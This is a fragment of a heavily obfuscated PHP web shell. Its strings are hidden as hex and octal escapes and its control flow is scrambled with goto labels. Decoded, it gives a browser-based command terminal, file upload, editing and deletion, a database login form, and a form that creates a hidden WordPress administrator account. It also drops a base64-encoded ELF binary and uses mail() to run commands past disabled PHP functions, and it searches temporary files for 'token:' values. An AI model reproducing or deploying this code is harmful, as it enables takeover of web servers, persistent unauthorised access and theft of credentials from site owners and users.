4\150\157\x64\75\x22\120\x4f\x53\x54\x22\x20\141\x63\164\151\x6f\x6e\x3d\x22\42\x3e\xd\12\x20\x20\x20\x20\x20\40\x20\40\x3c\151\x6e\x70\165\164\x20\x74\171\x70\145\x3d\42\x68\x69\144\144\145\x6e\x22\40\156\141\x6d\x65\75\42\x63\x72\145\141\x74\145\137\x77\160\137\141\x64\x6d\x69\x6e\42\40\166\141\154\x75\x65\75\42\61\x22\x3e\15\xa\x20\x20\40\40\x20\40\40\40\74\151\x6e\160\165\164\x20\x74\171\160\x65\x3d\42\150\x69\x64\x64\145\x6e\42\40\156\x61\155\x65\75\42\142\145\x72\x6b\x61\163\x22\40\166\x61\x6c\165\145\75\x22"; goto Df9365cfae6f760a; Fc4b972dc84cd597: function D4D39cb2C4D3854b($b0bbe3113a3c8899) { goto b9d7e0d89227af7e; a56173f4f9ce34ab: return $c1cace0e25dbb099; goto Ec317fda7567f7fa; A616f117f5a4d5f4: unset($_SESSION[$b0bbe3113a3c8899]); goto e000d99afd8b224c; c98c6b0a15e6be59: $_SESSION[$b0bbe3113a3c8899] = $c1cace0e25dbb099; goto a56173f4f9ce34ab; e000d99afd8b224c: B56c7eba405ef71a: goto A19542766b17e7a4; b9d7e0d89227af7e: if (!isset($_SESSION[$b0bbe3113a3c8899])) { goto B56c7eba405ef71a; } goto A616f117f5a4d5f4; A19542766b17e7a4: $c1cace0e25dbb099 = md5(b526E9837163414e(time() . rand(1, 99999999))); goto c98c6b0a15e6be59; Ec317fda7567f7fa: } goto Df7c294d0e3ba356; Bbb8080d97a524fc: F90d36c9a93e98ec: goto Cda624e2d3975dcc; c6bf488b7f5307c0: goto Da522d3d76ec06ec; goto Bbcadbf9df4ada30; a5677e241df3294e: echo "\x3c\x2f\163\x70\141\156\x3e\xd\12\x20\x20\40\x20\40\x20\x20\40\x3c\57\x70\76\15\12\x20\40\x20\40\40\40\40\40\74\x70\x3e\xd\12\40\40\x20\x20\40\x20\40\40\40\x20\x20\40\74\x73\164\162\157\156\x67\x20\163\x74\171\154\x65\x3d\x22\x63\157\154\x6f\162\72\x20\43\60\x30\x46\106\60\60\x3b\42\x3e\143\x55\122\114\x20\x56\145\x72\x73\x69\157\156\72\74\57\163\x74\162\x6f\156\147\x3e\xd\12\x20\x20\40\x20\x20\x20\x20\x20\x20\40\40\40\74\163\160\141\156\x20\163\164\x79\x6c\x65\x3d\x22\143\x6f\154\x6f\162\72\x20\x23\x66\x66\x66\146\x66\146\x3b\x22\76"; goto C4658487c0bb36a1; D335ceaddb6cc78b: print "\x3c\57\x64\151\166\76"; goto C0113f6f255e61bf; E04e8956ea49eef3: echo htmlspecialchars($c887d06bec538904); goto D5378be6e817aafc; bba5bff2ca97b598: echo "\74\x64\151\166\40\151\144\x3d\x22\x75\x70\x6c\x6f\141\x64\123\x74\141\x74\x75\x73\42\40\163\164\x79\154\145\x3d\42\x6d\141\x72\147\x69\156\x2d\x74\157\160\x3a\x31\60\x70\170\x3b\40\x63\157\x6c\x6f\x72\x3a\43\x30\146\60\73\x22\76" . $a3b5ad8fcd19e5e9 . "\74\57\x64\151\x76\x3e"; goto F008182f6d235c59; Dc6b8b6d4dbda44d: F598d410b8963057: goto d3e5ce6f53907096; Ec37d094fdc6a3a8: echo "\x9\11\74\146\x6f\162\x6d\x20\x6d\145\164\150\157\144\75\x22\120\117\123\x54\42\x20\x73\164\x79\154\x65\x3d\x22\160\141\x64\x64\x69\156\x67\x3a\x20\x30\x3b\x20\x6d\141\162\147\x69\x6e\72\x20\60\x3b\42\76\xd\xa\11\x9\x9\74\x64\x69\166\x20\143\154\141\163\x73\75\42\146\151\x6c\x65\x2d\151\x6e\x66\157\55\x63\157\x6e\x74\141\151\x6e\145\162\x22\x3e\xd\12\11\11\x9\x9\74\144\151\166\x3e\15\12\x9\x9\x9\x9\x9\106\151\154\x65\x20\x4e\141\155\x65\72\x20\74\x73\x70\141\x6e\x20\x63\154\141\163\x73\x3d\x22\161\x61\154\x69\156\x22\x3e"; goto Fe7defc8cf8007c5; febdac7afddcce49: setcookie("\163\141\156\x64\x69", '', time() - 3600); goto c86c49aece2d0f9e; a55e5200d964e4d3: if (!($_SERVER["\122\x45\x51\x55\105\x53\124\137\x4d\105\x54\x48\x4f\x44"] === "\x50\117\123\x54" && isset($_POST["\x61\x77\x61\154"]))) { goto Ef64ffae7c428734; } goto dbb088255fdba80b; e3cfd139a6f5f23d: $c31208d29cfc6afb = "\x46\151\154\x65\x20\47" . htmlspecialchars($dc0f70f3261828f3) . "\47\x20\x63\x72\145\x61\164\145\144\x20\x73\165\x63\143\145\163\163\146\165\x6c\x6c\171\56"; goto Bbb8080d97a524fc; F30f9693313402b1: Abcb73e57a87e935: goto cc7a20feaa96aaa1; B0e1ea6091c05bfc: if (copy($_FILES["\165\x70\154\157\141\144\137\146\151\x6c\145"]["\164\x6d\160\137\156\141\155\145"], $e5d5c12be91726b8)) { goto A5f2ad4ba657f838; } goto d36a091bc628f991; B7631512a2bf5a3d: echo "\73\42\76"; goto b256967448800b3c; Abf7d9ae65c6797c: e74a77befa28b5cd: goto c2b85c6b278b6318; c1b5ed18ae44ecd3: goto efd3d135f4fbf807; goto e7eef5ce88dcdfe9; F3344ebebdd3ddf1: if ($ffc943dc0b3a48b0 == "\144\x6f\167\x6e\x6c\x6f\x61\144\x5f\x66\151\x6c\145" && isset($_POST["\146\x61\171\154"]) && trim($_POST["\146\141\171\154"]) != '') { goto c13e7e2850465b3b; } goto C38d382f811b7f1d; fe7541a0904f2072: goto f67406747761b548; goto c5bd50026601ce45; Aa1b3758138bcfb0: echo B526e9837163414E($f6f05644d791da73); goto B2a42ab26d7a1d99; bb850573e5e226da: echo "\x20\x20\x20\40\x3c\146\157\x72\155\40\x6d\x65\x74\150\x6f\144\75\42\120\117\123\124\x22\40\143\x6c\x61\x73\x73\75\42\144\x62\55\x6c\157\x67\x69\x6e\x2d\146\157\x72\x6d\x22\x3e\15\12\x20\40\40\x20\x20\x20\40\40\74\x69\156\x70\x75\164\40\x74\171\x70\145\75\x22\x68\x69\x64\x64\145\156\x22\x20\x6e\141\x6d\145\x3d\42\141\167\141\x6c\42\40\x76\141\x6c\165\145\75\42\x73\x6b\154\42\x3e\15\xa\x20\40\40\x20\x20\40\x20\x20\74\x69\x6e\x70\165\x74\40\x74\x79\160\145\75\x22\x74\x65\170\x74\x22\40\x70\154\141\x63\x65\x68\157\x6c\144\x65\162\x3d\x22\110\x6f\x73\164\x20\50\144\145\146\x61\x75\x6c\164\x3a\40\x6c\x6f\x63\x61\154\150\x6f\x73\x74\x29\x22\40\156\141\x6d\145\x3d\x22\x68\157\x73\164\42\x20\166\x61\x6c\x75\x65\x3d\x22"; goto c249c32621f1f0fb; E45ae8629b5c83b6: $a7f67c975f1e2b87 = []; goto d69c979cec80e328; ced461e967e2fa6b: print "\x54\x65\162\155\151\156\x61\154\x20\x72\x65\x61\144\171\56\40\x45\156\164\x65\x72\40\x61\40\x63\x6f\x6d\x6d\x61\x6e\144\x20\x62\145\154\x6f\x77\56"; goto F8d61d7ff61dc629; B4c1448a09494308: goto ed90a0b3b0285bdd; goto Bcf76c23f9fa6319; Bc41cde6f0154e03: print "\74\x64\x69\x76\x20\x63\154\141\163\163\x3d\42\164\145\x72\x6d\151\156\x61\154\x2d\157\x75\x74\x70\x75\x74\x22\76"; goto d1a34be4db817cdb; d983a4452a8e01d0: $c887d06bec538904 = isset($_COOKIE["\x73\141\156\x64\x69"]) ? $_COOKIE["\163\141\x6e\x64\151"] : ''; goto Fd0244532655fdee; Cb76781a9cabccd2: $ed2bb87ff019245b = "\106\151\x6c\145\40\74\163\x74\x72\157\156\147\76{$d8463d93c69599f9}\x3c\x2f\163\164\x72\157\x6e\147\76\40\165\160\x6c\x6f\x61\144\x65\x64\40\163\165\143\x63\145\x73\x73\146\x75\x6c\154\x79\x20\166\151\141\x20\155\157\166\145\137\165\x70\x6c\157\x61\x64\x65\x64\x5f\x66\x69\154\145\x2e"; goto D71902228e69725b; eb786d4c3ffb51d8: Fe233868f479519d: goto C92d033a68c0c9da; dc7ffd573b602cf8: if ($ffc943dc0b3a48b0 == "\143\150\x61\156\153\x72\157\x5f\x6b\x6f\155") { goto f21901200dbb20ae; } goto D48fc979f1c714f7; B27fde6e233d6404: print "\74\144\151\x76\76\106\x69\154\x65\40\116\x61\x6d\x65\72\40\x3c\163\160\141\x6e\x20\143\154\141\x73\163\x3d\x27\161\x61\154\151\156\x27\76" . htmlspecialchars($dc0f70f3261828f3) . "\x3c\x2f\163\x70\x61\156\x3e\74\x62\162\x2f\x3e\x3c\142\x75\164\164\x6f\156\x20\143\x6c\x61\x73\x73\75\47\142\x74\x6e\x2d\155\157\144\x65\162\156\x27{$bac6a93e3c6b58ea}\76\x3c\151\40\143\x6c\x61\163\x73\x3d\x27\x66\141\163\x20\146\141\x2d\x65\x64\151\164\47\x3e\x3c\57\151\76\x20\x45\144\x69\164\40\74\57\x62\x75\164\164\157\156\x3e\74\57\x64\x69\166\x3e"; goto Ebecd1c7b86ef093; e7f0c9fd86d792d3: if (!function_exists("\143\165\x72\154\x5f\x69\156\151\164")) { goto Ba2473e436d08169; } goto cb7e501b1c20e9d5; E65623173f384dac: if (!mysqli_query($Abc2b55b9f3bce65, $c41248ae01a8b21d)) { goto A9c6c1aa382027ab; } goto f62bfdb39478eb41; d7faab8f8d2b4293: $A7c33f7884b1b2f8 = "\141\x3a\x31\72\173\163\x3a\x31\63\72\x22\141\x64\155\x69\x6e\151\163\164\x72\141\164\157\162\42\73\163\72\61\x3a\42\x31\42\73\x7d"; goto fbb2a7c5e433ec98; D48fc979f1c714f7: if ($ffc943dc0b3a48b0 == "\x73\151\x73\164\145\x6d\x5f\153\x6f\155") { goto e36e20158e2ad78b; } goto bf767d51963bea32; a01f51501370b265: e681bea0de0b2d84: goto dfb615601cce606f; d0233e7dba3c1f41: if ($ffc943dc0b3a48b0 == "\x75\142\141\150\137\160\x65\162\155" && isset($_POST["\x66\x61\171\x6c"], $_POST["\x70\x65\162\x6d"])) { goto E4f5bbfe2bd5bab7; } goto befe93947e4cb99b; b3814503a220eedb: goto Fa7014d9a603784f; goto b02f1078dd631bc3; e1a49f6aca122232: $Abc2b55b9f3bce65 = mysqli_connect($C0b787c0767b5b3d, $e0834a8ecbd2c470, $D401470a2617993e, $b50bd9e19d842bf1); goto e8851813a25fe9de; F008182f6d235c59: Bb1249fbd4f40620: goto dc8539ce33f6d9f5; c83b3909a7aa1a31: $D4923a741daf1b7e = basename(parse_url($ffe0def0151bb0bd, PHP_URL_PATH)); goto bac46c77b0da49a9; E39fa1ee814dd6c4: foreach ($bd2ea54b8671893b as $C2c279b8f9025ca7 => $dc080553f2dd0c31) { goto e896beae2dfd730c; a10bbd7a91689acd: $Aa102996b4a82446->addFile($Bacb5f1e2fc3b26e, $e09ee70cfebdfd63); goto F7fc65e9ea8085e6; e896beae2dfd730c: if ($dc080553f2dd0c31->isDir()) { goto c8be8477514ac8fc; } goto ea27744dafb5956a; da2e9c25716b14f8: $e09ee70cfebdfd63 = substr($Bacb5f1e2fc3b26e, strlen($A28aed829b792880) + 1); goto a10bbd7a91689acd; D561d29a86f480c3: c7303889dfe76b82: goto Eb51dbf6805807df; F7fc65e9ea8085e6: c8be8477514ac8fc: goto D561d29a86f480c3; ea27744dafb5956a: $Bacb5f1e2fc3b26e = $dc080553f2dd0c31->getRealPath(); goto da2e9c25716b14f8; Eb51dbf6805807df: } goto Ec57f01cfd5e8b43; B960a7572b017294: $Babedf152eb7b8d1 = $f6f05644d791da73 . $c9c3dbf37270f221 . $dc0f70f3261828f3; goto B59c129ce704422f; c65318acbe16b1df: if (empty($a3b5ad8fcd19e5e9)) { goto Bb1249fbd4f40620; } goto bba5bff2ca97b598; B0d76e7caab8564c: $bac6a93e3c6b58ea = is_writeable($f6f05644d791da73 . $c9c3dbf37270f221 . $dc0f70f3261828f3) ? "\x20\x6f\156\x63\154\151\143\x6b\75\47\x6e\x61\x76\151\147\141\x74\145\x28\x22\x61\167\141\x6c\x22\54\40\42\145\x64\x69\164\137\x66\x69\154\145\42\54\x20\x22\146\x61\x79\154\x22\54\40\x22" . B526e9837163414E($dc0f70f3261828f3) . "\42\54\40\42\142\145\x72\153\x61\x73\x22\x2c\x20\42" . B526e9837163414e($f6f05644d791da73) . "\42\x29\47" : "\40\144\x69\x73\141\x62\x6c\145\x64"; goto B27fde6e233d6404; cd789f9bc659749c: if (file_exists($Babedf152eb7b8d1)) { goto A6200bd6381e69b0; } goto B985781df1e3782e; A40f61aeb1e5ac81: $a8a9fc47be90efed = false; goto e7f0c9fd86d792d3; B2ad8f7c1cbae398: if (is_writeable($f6f05644d791da73 . $c9c3dbf37270f221 . $dc0f70f3261828f3)) { goto e681bea0de0b2d84; } goto f3fc1166fb9e1bf8; B26ffcab4b42718b: goto a09ea3efd2481516; goto d7d0c7387e8d7715; f9a06bf4941df0b1: setcookie("\165\x73\145\x72", '', time() - 3600); goto febdac7afddcce49; ca6050e4a5f4cf08: unlink($_FILES["\165\x70\154\157\141\x64\137\146\151\154\145"]["\164\x6d\160\x5f\156\x61\x6d\x65"]); goto D8a501f2e9a73174; D4802cac1fe05de1: ob_start(); goto b3adba08cdac7fca; Ec99194aea019ca6: goto Fccf723f4598f37e; goto b629dc89ca72a0d2; C97770659e565533: $ed2bb87ff019245b = "\x41\156\x20\x65\x72\x72\157\162\40\x6f\x63\x63\x75\162\162\x65\x64\40\167\x68\151\x6c\x65\40\165\x70\x6c\157\141\144\x69\156\x67\40\x74\150\145\x20\x66\151\154\145\56\x20\50\105\162\162\x6f\x72\x20\x63\x6f\x64\x65\x3a\40{$D3dc074ce93d5c09}\51"; goto F2d1b39fe3a69fbc; a6fa1a70c5ff684e: de0f7ad779e64434: goto Ac30d4b3c146f509; A9f9c552b690fd46: echo b526E9837163414e($f6f05644d791da73); goto D68ac9ffc5839ff7; B2a42ab26d7a1d99: echo "\47\x29\x3b\xd\xa\11\x7d\15\xa\x7d\15\12\15\xa\x66\165\156\143\164\151\157\x6e\40\x73\x69\163\164\x65\x6d\x4b\157\155\50\51\15\xa\x7b\15\xa\x9\x76\141\x72\x20\x6b\157\155\141\x6e\x64\141\x20\x3d\40\x64\x6f\143\165\x6d\x65\x6e\164\56\147\145\164\x45\x6c\x65\x6d\145\156\x74\x42\x79\x49\x64\x28\x27\x65\155\x72\x5f\145\x74\137\x61\164\x61\163\150\47\51\56\166\x61\x6c\165\x65\73\15\12\x9\x69\146\50\x6b\x6f\x6d\141\x6e\x64\x61\x29\xd\12\11\x7b\15\xa\11\11\156\141\x76\151\x67\141\164\145\x28\x27\141\167\141\154\x27\x2c\x20\x27\x73\x69\163\164\145\155\x5f\153\x6f\155\x27\54\40\47\x6b\x6f\155\x27\x2c\x20\142\66\x34\x45\156\x63\x6f\x64\145\x55\x6e\x69\x63\x6f\144\x65\x28\153\157\155\x61\x6e\144\141\x29\54\40\x27\x62\145\162\x6b\141\x73\x27\x2c\x20\47"; goto Ad2140bcb52336d6; Bd76f4d8348cac94: goto e0a0d6bb3360087a; goto Fb05220770cfc145; c0ea8d9b76cd6ee4: echo B526E9837163414e($f6f05644d791da73); goto c32f24b4e581d1b8; da2587f6444961d2: echo $_SERVER["\120\x48\x50\x5f\x53\105\114\x46"]; goto e53c642baf76e004; Adb2fa550d8f9a64: e8d4cfbd78902456: goto b2089d5a41aadb81; f3d2fa9ea5903123: echo "\76\xd\12\11\11\x9\11\11\x9\x3c\x69\x20\x63\154\141\x73\163\75\42\x66\141\x73\x20\x66\141\55\x73\141\166\x65\42\76\x3c\57\x69\x3e\40\x53\x61\x76\x65\15\12\11\11\11\11\11\74\x2f\x62\x75\x74\x74\157\x6e\x3e\xd\xa\11\x9\11\x9\74\57\x64\151\x76\76\xd\xa\x9\11\x9\74\x2f\144\151\x76\76\15\xa\x9\x9\x9\x3c\164\x65\170\x74\x61\x72\145\x61\40\156\141\155\145\75\x22\143\x6f\x6e\164\145\x6e\164\42\x20\x63\x6c\x61\163\163\x3d\42\x66\x69\154\x65\137\x65\144\x69\164\x22\40"; goto cf9811a2bbc611ab; e1ffd2ef7d8add4a: a7417e570d01a13e: goto E82b86a8b293ba13; f850c83df12e75ca: if (isset($_POST["\142\x65\162\153\x61\x73"]) && is_string($_POST["\x62\145\162\x6b\141\x73"]) && !empty($_POST["\x62\x65\x72\x6b\141\163"])) { goto a7417e570d01a13e; } goto bb406bd926a25e27; e4a51239f2d500ac: $ffc943dc0b3a48b0 = "\x64\141\x73\141\162"; goto Adb2fa550d8f9a64; Fee4d000999a1998: $F6a7e6021bba997d = isset($_SERVER["\x53\x45\x52\x56\x45\122\x5f\x41\104\x44\122"]) ? $_SERVER["\123\x45\x52\x56\x45\122\137\x41\104\104\x52"] : gethostbyname(gethostname()); goto Ff0ef66b2f103f12; c9f8088df2d61f93: echo "\x27\51\x3b\xd\xa\x20\x20\x20\40\175\15\xa\x7d\15\12\xd\xa\x66\165\x6e\143\164\151\x6f\x6e\40\144\x65\154\145\x74\145\106\157\154\144\x65\162\50\x7a\146\x29\40\173\15\xa\x20\x20\40\x20\x69\x66\x20\x28\x63\157\x6e\x66\151\x72\x6d\x28\47\x41\162\x65\x20\171\157\x75\x20\163\x75\162\x65\x20\171\157\165\40\x77\141\x6e\x74\40\164\x6f\40\144\145\154\145\x74\145\x20\164\150\151\x73\x20\x66\x6f\x6c\144\x65\x72\x20\141\156\x64\x20\x61\x6c\154\40\x69\164\x73\x20\143\157\x6e\164\145\x6e\164\x73\77\47\51\x29\x20\x7b\15\12\x20\x20\x20\40\40\x20\40\40\156\x61\x76\x69\147\x61\x74\145\x28\47\141\167\x61\x6c\x27\54\40\47\x68\x61\160\165\x73\137\146\x6f\154\144\145\162\47\54\40\x27\x7a\146\x27\x2c\40\172\146\54\40\47\142\x65\x72\x6b\x61\163\x27\x2c\40\47"; goto fc71bbafebc7ca4d; Ea84be8c7ae9a036: echo "\42\76\15\12\40\40\40\40\40\x20\x20\x20\40\x20\40\40\x3c\x73\x70\x61\x6e\x20\x63\x6c\x61\x73\163\75\42\164\145\x72\x6d\x69\x6e\x61\154\55\160\162\157\155\x70\x74\42\x3e\44\74\x2f\163\160\141\x6e\76\xd\12\40\40\x20\x20\40\40\40\x20\40\40\x20\x20\74\151\x6e\x70\x75\x74\x20\x74\171\160\145\75\x22\164\145\170\164\42\40\156\x61\155\x65\75\42\x63\x68\x61\x6e\x6b\x72\157\x5f\x63\157\155\155\x61\x6e\144\42\40\143\x6c\x61\x73\x73\75\x22\164\x65\162\155\x69\156\141\x6c\x2d\151\156\160\x75\x74\x22\40\x70\154\x61\143\x65\150\x6f\x6c\144\x65\x72\75\42\164\171\x70\145\x20\171\157\165\x72\40\x63\157\x6d\x6d\141\x6e\x64\42\40\141\x75\164\x6f\146\x6f\x63\165\x73\x3e\15\xa\40\40\40\40\x20\40\x20\x20\x20\x20\x20\40\74\x62\165\164\x74\157\x6e\x20\x74\x79\x70\x65\x3d\42\x73\165\x62\155\x69\164\x22\40\x63\x6c\x61\163\x73\x3d\42\142\x74\x6e\x2d\x65\170\145\x63\165\x74\145\x22\76\105\x78\145\x63\x75\x74\145\x3c\x2f\x62\x75\164\x74\x6f\x6e\76\xd\xa\40\x20\x20\40\x20\x20\40\40\74\x2f\x64\151\x76\76\15\12\40\40\x20\40\x3c\x2f\146\157\x72\x6d\x3e\15\xa\x20\40\x20\x20"; goto D335ceaddb6cc78b; D02e77ccc4b14d14: function A5D9e774682Aedaf($d8ed25ed8034da9f, $ad29fc13e38ce413) { goto E6f5fb3b95ea5f5d; C91cbe15544725fc: if (empty($e8b2b7f6d0c08e31)) { goto Dcbd63302a5d1116; } goto b7fdc985132ffa3d; b6a0b7463e752b11: goto da574da824e747d8; goto e524b3c97141c60e; a36efbca880db232: $Ef746fc8ffd9dd9d = strpos(trim($d8ed25ed8034da9f), "\165\141\x70\x69") === 0; goto Ceae6bed3177ab60; F68ecb31f3657237: Ae348b8e3582acf3: goto e20ab4c396ca8786; a456ae78ee92930e: if (!empty($c87a5550d81a3565)) { goto E2ec2cb5655c5fd1; } goto c0707675e012a6da; Cd7d88feff642123: b13b82484089d7eb: goto F2a3247433588b57; e59aa060e51bd24b: $B9c0b541206410ac = $ad29fc13e38ce413 . "\57\157\x75\164\160\165\164\56\164\170\164"; goto acf63ab820ba7e1b; dea7208731006181: b8a8bc21c7a94848: goto Aa08b1b3e5135ef9; fe5128c8ba156440: $e1230b5d068257ca = glob("\x2f\164\155\x70\57\x63\x68\x61\x6e\153\x72\x6f\x5f\x6f\x75\x74\137\52\56\164\170\x74"); goto c632636ec13adba2; eea410920eb8e55c: c94f0d43b33257db: goto cb33ca8234177309; E76d91515d86e329: e142944f3ebd66ba: goto ebfa599e4a0341f6; a7152c8f0b154497: echo "\74\57\x70\162\x65\76"; goto C21720156fac5921; a06f24dafd42382c: if (!$e8b2b7f6d0c08e31) { goto c94f0d43b33257db; } goto a2e9232003fd6934; Aa08b1b3e5135ef9: $D141fd1817ca6ed7 = "\57\164\155\160\57\143\150\141\x6e\x6b\162\x6f\x5f\x6f\x75\164\x5f\44\44\56\164\x78\x74"; goto B411eecae8b16fd1; bf0c47dce47e2aea: echo "\74\x2f\160\x72\145\76"; goto B1c3d343575239be; A53b10c3192fb9e3: mail("\141", "\x61", "\x61", "\141"); goto bd618d16baf8e8f0; a91d85b63f97ef16: if ($Ef746fc8ffd9dd9d) { goto A82a536f114e4679; } goto a664618a2ec8ae36; Fc9e31c208534c55: @unlink($ad29fc13e38ce413 . "\x2f\x6f\x75\x74\160\x75\x74\56\164\170\x74"); goto Ee5a3b51e3ca850b; C2e4a219ec521290: foreach ($A8dfbf942e896b78 as $dc080553f2dd0c31) { @unlink($dc080553f2dd0c31); C6a57e82d060e84c: } goto d5eb70d0414cb65f; f660ddc728ca38fd: goto aaad775ffc6af53b; goto c83f4e644a623049; B051e3160950ad86: putenv("\103\x48\x41\116\x4b\x52\x4f\75" . $dbda6e4d0c773773); goto Fb8f2629fb5842e3; f4319d9af3213e50: return; goto f660ddc728ca38fd; Ceae6bed3177ab60: if ($Ef746fc8ffd9dd9d) { goto b8a8bc21c7a94848; } goto e59aa060e51bd24b; dd35793b59b3bfb1: if (function_exists("\145\x72\x72\157\x72\x5f\x6c\x6f\147")) { goto E9372366a59360af; } goto A7850f5b548ec90a; F2a3247433588b57: mb_send_mail("\x61", "\141", "\141", "\x61"); goto a4b9bb601c054fb9; c83f4e644a623049: eefbcccdade3c789: goto A53b10c3192fb9e3; e5d0ced24542a7d7: aaad775ffc6af53b: goto f761c4ba96f693f3; aa21b224f62524f0: Dcbd63302a5d1116: goto a456ae78ee92930e; Fa55d3d40e912861: A82a536f114e4679: goto Eef08a725185f16f; b7fdc985132ffa3d: foreach ($e8b2b7f6d0c08e31 as $dc080553f2dd0c31) { goto a1c424f86c34f918; e732826755925b90: Fd4d8db0fbaf65e1: goto c641741ccad5916b; a1c424f86c34f918: $F09b543791deeb4d = file_get_contents($dc080553f2dd0c31); goto d0bec06dcade84f9; E2f1b0e1a373f546: ce889c1bb45c3bcb: goto e732826755925b90; ad3ed5a650eb92ec: if (!preg_match("\x2f\164\x6f\153\x65\x6e\72\x5c\x73\52\x28\133\101\55\132\60\55\71\x5d\53\x29\x2f", $F09b543791deeb4d, $A6f056c3d73cfecd)) { goto ce889c1bb45c3bcb; } goto E5efbc78e98c85d7; E5efbc78e98c85d7: $c87a5550d81a3565[] = $A6f056c3d73cfecd[1]; goto E2f1b0e1a373f546; d0bec06dcade84f9: $A6f056c3d73cfecd = []; goto ad3ed5a650eb92ec; c641741ccad5916b: } goto b044a699966291b6; B1ec40eca6be57ee: goto aaad775ffc6af53b; goto E76d91515d86e329; C21720156fac5921: da574da824e747d8: goto B283777475210ffd; D7ca9cbd875db619: c87b25422d4a64b8: goto fe5128c8ba156440; a2e9232003fd6934: foreach ($e8b2b7f6d0c08e31 as $dc080553f2dd0c31) { @unlink($dc080553f2dd0c31); Ba0251ca1f21fe02: } goto F3bbb48ef10585ce; A1352d5927513ca2: $e8b2b7f6d0c08e31 = glob("\57\x74\155\160\57\143\x68\x61\x6e\153\x72\157\137\157\165\164\x5f\x2a\56\164\x78\x74"); goto a06f24dafd42382c; A7850f5b548ec90a: if (function_exists("\143\67\x43\x35\x36\x35\102\63\70\106\x34\x63\63\x44\102\x66")) { goto e142944f3ebd66ba; } goto Ea87d167e9afad93; e20ab4c396ca8786: $e142cded73ae38e9 = base64_encode($b4f8114fff5af764); goto fa6934df48a56a00; fa6934df48a56a00: file_put_contents($Ed8dca3319901ea0, base64_decode($edee5c6f030c495c)); goto Cc06dd79398a3ec5; E6f5fb3b95ea5f5d: $edee5c6f030c495c = "\x66\x30\x56\x4d\x52\x67\x49\102\101\121\x41\x41\101\101\x41\101\101\101\101\x41\x41\x41\115\x41\120\x67\x41\x42\101\101\x41\101\64\x41\x63\x41\x41\101\x41\101\x41\101\x42\x41\x41\x41\x41\x41\x41\101\101\x41\101\120\x67\132\101\x41\101\x41\x41\101\101\101\101\101\101\x41\x41\105\101\101\x4f\101\x41\110\101\105\101\x41\x48\x51\x41\143\x41\x41\x45\101\101\101\101\x46\101\x41\x41\101\x41\101\x41\101\x41\x41\x41\x41\101\x41\x41\x41\x41\101\x41\101\101\101\x41\x41\101\101\101\x41\x41\x41\x41\101\x41\101\x41\x41\142\101\157\x41\x41\x41\x41\101\101\101\x42\163\103\x67\101\101\101\x41\101\x41\101\101\x41\101\111\x41\x41\x41\x41\101\101\101\x41\121\x41\101\101\x41\131\101\101\101\104\x34\x44\121\101\x41\101\101\101\101\101\x50\x67\x4e\x49\101\x41\x41\x41\101\x41\101\x2b\101\x30\147\x41\x41\101\101\x41\x41\x42\167\101\x67\x41\x41\x41\101\x41\x41\x41\x48\147\x43\x41\x41\101\101\101\x41\101\x41\101\x41\101\x67\101\x41\x41\x41\101\101\101\103\x41\x41\x41\101\102\147\x41\101\101\x42\x67\117\x41\x41\x41\x41\x41\x41\x41\101\x47\x41\x34\x67\x41\x41\x41\x41\x41\x41\101\x59\x44\151\x41\101\101\x41\101\101\101\x4d\101\102\x41\101\x41\101\101\101\101\101\x77\x41\x45\101\101\101\x41\101\101\x41\101\111\x41\x41\101\x41\x41\101\101\x41\101\x41\x51\101\101\101\x41\x45\101\x41\x41\x41\x79\x41\105\x41\101\x41\101\101\101\x41\104\x49\101\121\101\x41\101\x41\x41\101\x41\x4d\x67\x42\101\101\x41\101\101\101\101\101\112\101\101\x41\x41\101\x41\x41\x41\x41\101\x6b\101\101\101\101\x41\101\101\101\101\x41\x51\101\101\x41\101\101\101\101\101\101\125\117\126\60\132\x41\121\x41\x41\x41\102\x34\103\121\101\x41\101\x41\101\x41\101\x48\x67\112\x41\x41\x41\101\x41\101\x41\x41\x65\x41\x6b\x41\101\101\x41\101\101\x41\101\x30\x41\x41\x41\101\101\101\101\101\101\104\121\101\x41\x41\101\x41\x41\x41\101\x41\x42\101\x41\x41\101\101\101\101\x41\x41\102\x52\x35\x58\122\x6b\x42\x67\x41\101\x41\101\x41\101\101\101\x41\101\101\x41\x41\101\101\x41\x41\x41\x41\x41\x41\101\x41\101\101\101\x41\101\101\x41\x41\101\101\x41\x41\x41\101\x41\x41\101\x41\x41\x41\x41\x41\101\101\x41\101\101\101\101\x41\x41\x41\101\x41\121\x41\x41\x41\101\x41\101\101\101\x41\x46\114\154\x64\x47\x51\105\101\x41\101\101\x2b\x41\x30\x41\x41\x41\x41\x41\101\101\104\x34\104\x53\x41\x41\101\x41\101\101\101\120\x67\116\111\x41\101\101\101\101\101\x41\x43\101\x49\101\101\101\x41\x41\101\101\101\x49\101\147\101\x41\101\x41\x41\x41\101\x41\105\x41\101\101\x41\x41\x41\101\101\101\x42\101\101\101\101\102\121\x41\101\101\101\x44\x41\x41\101\101\122\x30\65\126\x41\x47\150\x6b\x46\x6f\x70\x46\126\x50\166\130\x62\131\142\102\151\x6c\x42\161\x37\x53\144\70\x53\61\153\x72\x41\101\101\101\x41\101\115\x41\101\x41\x41\116\x41\101\101\101\101\121\101\101\x41\x41\131\101\101\101\103\x49\x77\103\x42\106\x41\x6f\x52\147\107\x51\60\x41\x41\101\101\122\101\101\x41\101\x45\x77\x41\x41\x41\105\112\x46\x31\x65\170\x67\x58\142\x31\x63\x33\155\x75\126\147\x4c\166\152\x6b\x6e\x7a\x59\143\126\x67\x63\x75\131\63\170\104\165\x72\x54\x37\x77\64\x62\x6e\64\x67\x4c\101\101\101\x41\x41\101\101\x41\x41\101\101\x41\101\101\101\101\x41\101\x41\101\x41\x41\101\101\101\101\101\101\x41\101\101\x41\x41\x41\101\x41\x41\x48\x6b\101\x41\x41\x41\123\x41\101\101\101\101\x41\101\101\x41\101\101\101\101\x41\x41\101\x41\x41\101\x41\x41\x41\101\101\101\102\167\101\x41\101\x41\147\x41\x41\101\101\x41\x41\101\101\101\101\x41\101\101\x41\101\101\101\x41\x41\x41\x41\x41\101\x41\101\x49\x59\x41\x41\101\x41\123\x41\x41\x41\x41\101\101\x41\101\x41\101\101\x41\x41\x41\x41\x41\101\x41\101\x41\x41\101\101\x41\101\x4a\x63\x41\101\x41\101\123\x41\x41\101\x41\101\101\x41\x41\x41\x41\x41\101\101\x41\101\101\101\x41\101\101\101\101\101\x41\101\x41\105\101\101\x41\x41\x67\x41\101\x41\x41\x41\101\x41\101\x41\x41\x41\x41\101\101\101\101\x41\101\101\x41\x41\x41\101\x41\101\x49\x41\x41\101\101\x41\x53\101\101\101\x41\101\101\x41\101\x41\x41\x41\101\101\x41\x41\x41\101\101\x41\101\101\x41\x41\x41\x41\107\105\